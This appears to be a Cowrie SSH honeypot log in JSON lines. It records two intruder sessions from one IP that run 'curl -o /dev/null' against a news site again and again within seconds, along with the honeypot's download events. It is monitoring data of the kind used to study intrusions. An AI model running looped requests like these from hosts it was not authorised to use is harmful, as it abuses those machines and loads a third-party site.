{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:38.984294Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:38.985643Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:38.999357Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:39.017745Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:39.019157Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:39.025030Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:39.026283Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:39.060786Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:39.061921Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:39.064942Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:39.067562Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:39.069295Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:39.077028Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:39.099838Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:39.101114Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:39.120080Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:39.122290Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:39.124809Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:39.128513Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:39.145196Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:39.164571Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:39.165740Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:39.183545Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:39.185532Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:39.194371Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:39.232506Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:39.233610Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:39.235779Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:39.237251Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:39.345845Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:39.346860Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:39.349420Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:39.350523Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:39.364105Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:39.444072Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:39.493905Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:39.509290Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:39.534196Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:39.548544Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:39.576948Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:39.588403Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:39.596478Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:39.646046Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:39.648192Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:39.649448Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:39.652392Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:39.653479Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:39.691715Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:39.692876Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:39.698900Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:39.700328Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:39.705790Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:39.728516Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:39.730332Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:39.747913Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:39.749255Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:39.755302Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:39.756451Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:39.767540Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:39.779347Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:39.794509Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:39.795660Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:39.801635Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:39.802617Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:39.829361Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:39.838783Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:39.840138Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:39.846004Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:39.847913Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:39.849342Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:39.875952Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:39.879869Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:39.881220Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:39.881943Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:39.891968Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:39.892973Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:39.898025Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:39.913100Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:39.916655Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:39.917473Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:39.925681Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:39.930942Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:39.931933Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:39.952826Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:39.953839Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:39.972279Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:39.973384Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:40.004015Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:40.005463Z","src_ip":"212.227.125.160","session":"7541ed730449"}
